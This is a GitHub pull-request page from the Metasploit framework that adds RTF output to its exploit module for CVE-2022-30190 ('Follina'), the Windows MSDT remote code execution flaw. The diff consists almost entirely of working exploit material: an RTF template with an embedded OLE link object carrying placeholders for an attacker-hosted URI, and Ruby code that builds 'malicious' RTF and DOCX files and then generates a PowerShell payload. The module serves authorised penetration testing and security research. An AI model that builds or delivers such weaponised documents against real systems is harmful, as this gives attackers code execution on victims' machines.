Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add rtf support to cve-2022-30190 AKA Follina #16734

Merged
merged 3 commits into from
Aug 25, 2022
Merged

Add rtf support to cve-2022-30190 AKA Follina #16734

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
ef9f5ca
Add rtf support to cve-2022-30190 AKA Follina
bwatters-r7 Jun 30, 2022
1159555
Fix up the Unicode coversions and update docs
bwatters-r7 Aug 17, 2022
6831322
fix up the uri_space maths
bwatters-r7 Aug 25, 2022
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
30 changes: 30 additions & 0 deletions data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
4f4c45324c696e6b000000000000000000000c0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
}}}}
39 changes: 32 additions & 7 deletions modules/exploits/windows/fileformat/word_msdtjs_rce.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Post::File

def initialize(info = {})
super(
Expand Down Expand Up @@ -61,6 +62,7 @@ def initialize(info = {})

register_options([
OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
OptEnum.new('OUTPUT_FORMAT', [true, 'Obfuscate JavaScript content.', 'docx', %w[docx rtf]]),
bwatters-r7 marked this conversation as resolved.
Show resolved Hide resolved
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
])
end
Expand Down Expand Up @@ -174,27 +176,50 @@ def pack_docx
Msf::Util::EXE.to_zip(@docx)
end

def primer
print_status('Generating a malicious docx file')
def build_rtf
print_status('Generating a malicious rtf file')

@proto = (datastore['SSL'] ? 'https' : 'http')
uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
uri_space = 76
if uri.length > 76
bwatters-r7 marked this conversation as resolved.
Show resolved Hide resolved
fail_with(Failure::BadConfig, 'The total URI must be under 75 characters')
end
uri_ascii = uri.each_byte.map { |b| b.to_s(16) }.join
uri_ascii << '0' * ((uri_space * 2) - uri_ascii.length)
# This is terrible, but will work for a test
uri_utf16 = uri.each_byte.map { |b| '00' + b.to_s(16) }.join
bwatters-r7 marked this conversation as resolved.
Show resolved Hide resolved
uri_utf16 << '0' * ((uri_space * 4) - uri_utf16.length)
rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf')
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_ascii)
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16)
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri)
file_create(rtf_file_data)
end

def build_docx
print_status('Generating a malicious docx file')

template_path = get_template_path
unless File.extname(template_path).downcase.end_with?('.docx')
fail_with(Failure::BadConfig, 'Template is not a docx file!')
end

print_status("Using template '#{template_path}'")
@docx = unpack_docx(template_path)

print_status('Injecting payload in docx document')
inject_docx

print_status("Finalizing docx '#{datastore['FILENAME']}'")
file_create(pack_docx)
end

@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
def primer
@proto = (datastore['SSL'] ? 'https' : 'http')

if datastore['OUTPUT_FORMAT'] == 'rtf'
build_rtf
else
build_docx
end
@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
super
end

Expand Down